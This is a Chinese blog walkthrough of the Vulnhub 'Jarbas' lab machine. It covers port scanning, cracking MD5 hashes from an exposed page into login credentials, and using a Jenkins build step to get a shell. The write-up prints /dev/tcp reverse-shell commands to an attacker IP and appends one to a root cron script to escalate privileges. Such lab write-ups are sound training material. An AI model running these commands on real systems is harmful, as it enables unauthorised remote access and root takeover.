【Vulnhub靶机】Jarbas--Jenkins

最新推荐文章于 2024-08-14 10:15:58 发布
最新推荐文章于 2024-08-14 10:15:58 发布
阅读量1k 收藏 10
点赞数 8
分类专栏: # 靶机系列 文章标签: jenkins 靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhaosong_/article/details/134617173
版权

文章目录

文档说明:https://www.vulnhub.com/entry/jarbas-1,232/

靶机下载:Download (Mirror):

信息收集

主机发现

扫描C段

sudo nmap -sn 10.9.75.0/24

image-20231125131716854

端口扫描

sudo nmap --min-rate 10000 10.9.75.10

image-20231125131847664

详细扫描服务版本,系统

sudo nmap -sT -sV -O -p 22,80,3306,8080 10.9.75.10

image-20231125132007149

目录爆破

dirsearch -u http://10.9.75.10 -i 200

image-20231125132323184

漏洞探测

whatweb

访问80端口

image-20231125132425330

whatweb http://10.9.75.10

image-20231125133245051

并没有识别到类似的CMS内容管理系统,

继续访问access.html发现了类似用户名:加密后的密码的东西

image-20231125132945210

hash-identifier

可以使用工具来验证加密类型

hash-identifier "5978a63b4654c73c60fa24f836386d87"

image-20231125133052923

拿去在线网站进行md5解密

image-20231125133516690

image-20231125133605822

image-20231125133636880

tiago:italia99

trindade:marianna

eder:vipsu

访问8080端口

image-20231125134737788

whatweb

whatweb http://10.9.75.10:8080

image-20231125134830353

指纹识别出一个Jenkins的CMS管理系统

尝试使用上面解密出来的密码进行登陆

使用eder:vipsu登陆成功!

image-20231125135041152

image-20231125135104467

新建一个任务

image-20231125135842524

选择第一个自由风格软件项目就可以,然后往下翻,点击确定

点击Build构建

image-20231125135948173

由于目标系统是linux系统,所以选择第二个execute shell

/bin/bash >& /dev/tcp/10.9.75.3/6868 0>&1

#反弹到kali上

点击应用,然后点击保存

image-20231125140121483

这个时候kali先监听6868端口

nc  -lvvp 6868

回到页面上点击立即构建

image-20231125140412821

就反弹到kali机器上了

image-20231125140529852

页面上会显示有一个任务正在运行

image-20231125140547563

我们拿到shell是没有回显的,可以通过python获取显示shell

python -c "import pty;pty.spawn('/bin/bash')"

image-20231125140911530

最后再计划任务里找到了以root运行 的程序

image-20231125141047389

查看文件内容

cat /etc/script/CleaningScript.sh

image-20231125141328159

可以在里面添加反弹shell,

echo "/bin/bash >& /dev/tcp/10.9.75.3/6869 0>&1" >> /etc/script/CleaningScript.sh

image-20231125141432284

kali监听6869端口,等待反弹

image-20231125141555084

Jenkins 的漏洞利用方式有很多,可以自行去网上查阅相关资料

过期的秋刀鱼-
关注
  • 8
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Vulnhub靶机系列:Jarbas1.0
汗的博客
04-26 792
这次的靶机vulnhub靶机Jarbas1.0,因为合天有在线靶机,就直接用合天的在线靶机了。 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权 靶机地址及相关描述 https://www.vulnhub.com/entry/jarbas-1,232/ If you want to keep your hacking studies, please try out...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
打靶:vulnhub中的JARBAS
qq_73865998的博客
04-08 895
复现视频:【「红队笔记」靶机精讲:JARBAS - Jenkins渗透原理详解,一个典型CMS渗透测试样本。
Jarbas-靶场
qq_46187131的博客
03-18 932
首先nmap做端口扫描,发现80和8080两个端口开放通过两个端口的Web浏览和目录扫描,发现8080是内容管理系统通过目录扫描得知账号密码,并成功登录新建一个项目的时候,写进了反弹shell,并拿到初始shell的权限收集提权信息发现自动任务有root权限运行的,并进行利用,写入shell成功拿到root权限,并查看flag。
vulnhub-Jarbas-wp
yutianovo的博客
09-04 316
靶机描述 http://blog.yutian233.xyz/index.php/ If you want to keep your hacking studies, please try out this machine! Jarbas 1.0 – A tribute to a nostalgic Brazilian search engine in the end of 90’s. Objective: Get root shell! 下载 https://www.vulnhub.com/entr
Vulnhub - Jarbas
qq_46081990的博客
03-16 354
Nmap扫描目标主机,发现开放22、80、8080、3306端口,分别运行OpenSSH 7.4、Apache httpd 2.4.6、Jetty、MariaDB服务,目标操作系统为Linux。因开放3306端口,猜测可能为MySQL账号密码,尝试连接但失败。对于类Github的中间件,比如上个靶场Devguru的Gitea,都可以去寻找有没有命令执行的地方,然后尝试反弹shell。将bash反弹命令追加到后面去,Kali这边nc监听5555端口,等待一段时间,成功收到会话拿到root权限和flag。
JARBAS - Jenkins渗透原理详解
2301_82000839的博客
05-31 816
打靶正常的思路,先nmap扫,tcp、udp全扫一遍,防止漏掉信息80优先思路、22ssh爆破放最后普通扫目录无信息、根据网站信息猜测、再指定扫描测试对编码进行hash-id识别、解码、利用信息尝试登录要么是ssh登录、要么是8080的登录;进行尝试进入网站登录后利用jenkins常用的漏洞、写linux执行的bash环境payload进行反弹shell权限比较低;无权查看shadow;sudo也没思路;查看自启任务有root权限写入poc;5分钟自动进入了root权限。
Vulnhub -- jarbas靶机渗透
Gh0st_1n_The_Shell的博客
05-31 676
信息收集 扫描开放的端口 进行目录爆破 尝试攻击 提权 提权--信息收集 目标:拿到服务器的Shell 信息收集 配置好后用nmap扫描 kali's ip:192.168.241.131 nmap -sP 192.168.241.131/24 一个个扫描 发现192.168.241.2是Vmware的服务,猜测jarbas的IP地址为192.168.241.142 扫描开放的端口 nmap -sV 192.168.241.142 ...
jarbas--靶机实操详解
qq_61802750的博客
10-12 267
枚举类型通常用于为程序中的一组相关的常量取名字,以便于程序的可读性和维护性。我们看到,最下边有条记录,每五分钟以root的权限,执行这个shell脚本,执行结果就是把它扔掉。80端口是http,攻击面很大,可以优先考虑。我们现在就在jackson这个账户,有不正常的交互。我们去识别一下下面的字符,看看是什么加密方式,不出意外的话就是MD5。我们试一下,使用eder账号,密码使用vipsu。那我们再写入一个shell,打开监听,看看是否是root权限。index是我们当前的页面,我们先访问一下access。
红队打靶:JARBAS详细打靶思路(vulnhub
Bossfrank的博客
06-03 1766
本文是vulnhub靶机JARBAS详细打靶过程,使用kali进行渗透。不同于单纯的writeup,本文详细提供了渗透的思路和每一步的用意。
红队靶机渗透-JARBAS
m0_57967573的博客
04-29 228
端口扫描发现了80和8080两个web端口,通过对两个web端口的浏览和目录爆破,发现它是一套Jenkins内容管理系统,8080端口是这个系统的登录界面; 我们并不知道登录用户名,密码,联想想到三种方式:1.暴力破解 2.网上寻找这套系统的默认密码 3.弱密码; 在对80端口的目录爆破中发现了access.html页面,存放有md5加密的3组用户名密码值,破解之后获得明文密码,在8080端口尝试登录,发现eder账号可以登录 ······
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
使用 RestHighLevelClient 进行 Elasticsearch 高亮查询及解析
一起coding,一起嗨。
08-13 401
使用 RestHighLevelClient 进行 Elasticsearch 高亮查询及解析
使用 RestHighLevelClient 进行 Elasticsearch 分页查询
一起coding,一起嗨。
08-13 445
使用 RestHighLevelClient 进行 Elasticsearch 分页查询
深入理解 Kibana 配置文件:一份详尽的指南
最新发布
一起coding,一起嗨。
08-14 375
深入理解 Kibana 配置文件:一份详尽的指南
Elasticsearch拼音分词器的安装、配置与测试实践
一起coding,一起嗨。
08-14 434
Elasticsearch拼音分词器的安装、配置与测试实践
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。对于想要提高渗透测试技能的安全从业者来说,这是一个非常有用的学习资源。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

过期的秋刀鱼-

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值